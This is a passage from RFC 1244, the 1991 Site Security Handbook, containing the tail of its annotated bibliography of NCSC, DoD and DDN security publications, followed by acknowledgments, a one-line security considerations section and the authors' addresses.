Spafford, G., “An Analysis of the Internet Worm”,
Proceedings of the European Software Engineering
Conference 1989, Warwick England, September 1989.
Proceedings published by Springer-Verlag as: Lecture
Notes in Computer Science #387. Also issued
as Purdue Technical Report #CSD-TR-933.

8.5 National Computer Security Center (NCSC)

All NCSC publications, approved for public release, are available
from the NCSC Superintendent of Documents.

NCSC = National Computer Security Center

Site Security Policy Handbook Working Group [Page 95]

RFC 1244 Site Security Handbook July 1991

9800 Savage Road
Ft Meade, MD 20755-6000

CSC = Computer Security Center:
an older name for the NCSC

NTISS = National Telecommunications and
Information Systems Security
NTISS Committee, National Security Agency
Ft Meade, MD 20755-6000

[CSC]
Department of Defense, “Password Management Guideline”,
CSC-STD-002-85, 12 April 1985, 31 pages.

The security provided by a password system depends on
the passwords being kept secret at all times. Thus, a
password is vulnerable to compromise whenever it is used,
stored, or even known. In a password-based authentication
mechanism implemented on an ADP system, passwords are
vulnerable to compromise due to five essential aspects
of the password system: 1) a password must be initially
assigned to a user when enrolled on the ADP system;
2) a user’s password must be changed periodically;
3) the ADP system must maintain a ‘password
database’; 4) users must remember their passwords; and
5) users must enter their passwords into the ADP system at
authentication time. This guideline prescribes steps to be
taken to minimize the vulnerability of passwords in each of
these circumstances.

[NCSC1]
NCSC, “A Guide to Understanding AUDIT in Trusted Systems”,
NCSC-TG-001, Version-2, 1 June 1988, 25 pages.

Audit trails are used to detect and deter penetration of
a computer system and to reveal usage that identifies
misuse. At the discretion of the auditor, audit trails
may be limited to specific events or may encompass all of
the activities on a system. Although not required by
the criteria, it should be possible for the target of the
audit mechanism to be either a subject or an object. That
is to say, the audit mechanism should be capable of
monitoring every time John accessed the system as well as
every time the nuclear reactor file was accessed; and
likewise every time John accessed the nuclear reactor
file.

Site Security Policy Handbook Working Group [Page 96]

RFC 1244 Site Security Handbook July 1991

[NCSC2]
NCSC, “A Guide to Understanding DISCRETIONARY ACCESS CONTROL
in Trusted Systems”, NCSC-TG-003, Version-1, 30 September
1987, 29 pages.

Discretionary control is the most common type of access
control mechanism implemented in computer systems today.
The basis of this kind of security is that an individual
user, or program operating on the user’s behalf, is
allowed to specify explicitly the types of access other
users (or programs executing on their behalf) may have to
information under the user’s control. […] Discretionary
controls are not a replacement for mandatory controls. In
any environment in which information is protected,
discretionary security provides for a finer granularity of
control within the overall constraints of the mandatory
policy.

[NCSC3]
NCSC, “A Guide to Understanding CONFIGURATION MANAGEMENT
in Trusted Systems”, NCSC-TG-006, Version-1, 28 March 1988,
31 pages.

Configuration management consists of four separate tasks:
identification, control, status accounting, and auditing.
For every change that is made to an automated data
processing (ADP) system, the design and requirements of the
changed version of the system should be identified. The
control task of configuration management is performed
by subjecting every change to documentation, hardware, and
software/firmware to review and approval by an authorized
authority. Configuration status accounting is responsible
for recording and reporting on the configuration of the
product throughout the change. Finally, though the process
of a configuration audit, the completed change can be
verified to be functionally correct, and for trusted
systems, consistent with the security policy of the system.

[NTISS]
NTISS, “Advisory Memorandum on Office Automation Security
Guideline”, NTISSAM CONPUSEC/1-87, 16 January 1987,
58 pages.

This document provides guidance to users, managers, security
officers, and procurement officers of Office Automation
Systems. Areas addressed include: physical security,
personnel security, procedural security, hardware/software
security, emanations security (TEMPEST), and communications

Site Security Policy Handbook Working Group [Page 97]

RFC 1244 Site Security Handbook July 1991

security for stand-alone OA Systems, OA Systems
used as terminals connected to mainframe computer systems,
and OA Systems used as hosts in a Local Area Network (LAN).
Differentiation is made between those Office Automation
Systems equipped with removable storage media only (e.g.,
floppy disks, cassette tapes, removable hard disks) and
those Office Automation Systems equipped with fixed media
(e.g., Winchester disks).

Additional NCSC Publications:

[NCSC4]
National Computer Security Center, “Glossary of Computer
Security Terms”, NCSC-TG-004, NCSC, 21 October 1988.

[NCSC5]
National Computer Security Center, “Trusted
Computer System Evaluation Criteria”, DoD 5200.28-STD,
CSC-STD-001-83, NCSC, December 1985.

[NCSC7]
National Computer Security Center, “Guidance for
Applying the Department of Defense Trusted Computer System
Evaluation Criteria in Specific Environments”,
CSC-STD-003-85, NCSC, 25 June 1985.

[NCSC8]
National Computer Security Center, “Technical Rationale
Behind CSC-STD-003-85: Computer Security Requirements”,
CSC-STD-004-85, NCSC, 25 June 85.

[NCSC9]
National Computer Security Center, “Magnetic Remanence
Security Guideline”, CSC-STD-005-85, NCSC, 15 November 1985.

This guideline is tagged as a “For Official Use Only”
exemption under Section 6, Public Law 86-36 (50 U.S. Code
402). Distribution authorized of U.S. Government agencies
and their contractors to protect unclassified technical,
operational, or administrative data relating to operations
of the National Security Agency.

[NCSC10]
National Computer Security Center, “Guidelines for Formal
Verification Systems”, Shipping list no.: 89-660-P, The
Center, Fort George G. Meade, MD, 1 April 1990.

Site Security Policy Handbook Working Group [Page 98]

RFC 1244 Site Security Handbook July 1991

[NCSC11]
National Computer Security Center, “Glossary of Computer
Security Terms”, Shipping list no.: 89-254-P, The Center,
Fort George G. Meade, MD, 21 October 1988.

[NCSC12]
National Computer Security Center, “Trusted UNIX Working
Group (TRUSIX) rationale for selecting access control
list features for the UNIX system”, Shipping list no.:
90-076-P, The Center, Fort George G. Meade, MD, 1990.

[NCSC13]
National Computer Security Center, “Trusted Network
Interpretation”, NCSC-TG-005, NCSC, 31 July 1987.

[NCSC14]
Tinto, M., “Computer Viruses: Prevention, Detection, and
Treatment”, National Computer Security Center C1
Technical Report C1-001-89, June 1989.

[NCSC15]
National Computer Security Conference, “12th National
Computer Security Conference: Baltimore Convention Center,
Baltimore, MD, 10-13 October, 1989: Information Systems
Security, Solutions for Today – Concepts for Tomorrow”,
National Institute of Standards and National Computer
Security Center, 1989.

8.6 Security Checklists

[AUCOIN]
Aucoin, R., “Computer Viruses: Checklist for Recovery”,
Computers in Libraries, Vol. 9, No. 2, Pg. 4,
1 February 1989.

[WOOD]
Wood, C., Banks, W., Guarro, S., Garcia, A., Hampel, V.,
and H. Sartorio, “Computer Security: A Comprehensive Controls
Checklist”, John Wiley and Sons, Interscience Publication,
1987.

8.7 Additional Publications

Defense Data Network’s Network Information Center (DDN NIC)

The DDN NIC maintains DDN Security bulletins and DDN Management

Site Security Policy Handbook Working Group [Page 99]

RFC 1244 Site Security Handbook July 1991

bulletins online on the machine: NIC.DDN.MIL. They are available
via anonymous FTP. The DDN Security bulletins are in the
directory: SCC, and the DDN Management bulletins are in the
directory: DDN-NEWS.

For additional information, you may send a message to:
NIC@NIC.DDN.MIL, or call the DDN NIC at: 1-800-235-3155.

[DDN88]
Defense Data Network, “BSD 4.2 and 4.3 Software Problem
Resolution”, DDN MGT Bulletin #43, DDN Network Information
Center, 3 November 1988.

A Defense Data Network Management Bulletin announcement
on the 4.2bsd and 4.3bsd software fixes to the Internet
worm.

[DDN89]
DCA DDN Defense Communications System, “DDN Security
Bulletin 03”, DDN Security Coordination Center,
17 October 1989.

IEEE Proceedings

[IEEE]
“Proceedings of the IEEE Symposium on Security
and Privacy”, published annually.

IEEE Proceedings are available from:

Computer Society of the IEEE
P.O. Box 80452
Worldway Postal Center
Los Angeles, CA 90080

Other Publications:

Computer Law and Tax Report
Computers and Security
Security Management Magazine
Journal of Information Systems Management
Data Processing & Communications Security
SIG Security, Audit & Control Review

Site Security Policy Handbook Working Group [Page 100]

RFC 1244 Site Security Handbook July 1991

9. Acknowledgments

Thanks to the SSPHWG’s illustrious “Outline Squad”, who assembled at
USC/Information Sciences Institute on 12-June-90: Ray Bates (ISI),
Frank Byrum (DEC), Michael A. Contino (PSU), Dave Dalva (Trusted
Information Systems, Inc.), Jim Duncan (Penn State Math Department),
Bruce Hamilton (Xerox), Sean Kirkpatrick (Unisys), Tom Longstaff
(CIAC/LLNL), Fred Ostapik (SRI/NIC), Keith Pilotti (SAIC), and Bjorn
Satdeva (/sys/admin, inc.).

Many thanks to Rich Pethia and the Computer Emergency Response Team
(CERT); much of the work by Paul Holbrook was done while he was
working for CERT. Rich also provided a very thorough review of this
document. Thanks also to Jon Postel and USC/Information Sciences
Institute for contributing facilities and moral support to this
effort.

Last, but NOT least, we would like to thank members of the SSPHWG and
Friends for their additional contributions: Vint Cerf (CNRI),
Dave Grisham (UNM), Nancy Lee Kirkpatrick (Typist Extraordinaire),
Chris McDonald (WSMR), H. Craig McKee (Mitre), Gene Spafford (Purdue),
and Aileen Yuan (Mitre).

10. Security Considerations

If security considerations had not been so widely ignored in the
Internet, this memo would not have been possible.

11. Authors’ Addresses

J. Paul Holbrook
CICNet, Inc.
2901 Hubbard
Ann Arbor, MI 48105

Phone: (313) 998-7680
EMail: holbrook@cic.net

Joyce K. Reynolds
University of Southern California
Information Sciences Institute
4676 Admiralty Way
Marina del Rey, CA 90292

Phone: (213) 822-1511
EMail: JKREY@ISI.EDU

Site Security Policy Handbook Working Group [Page 101]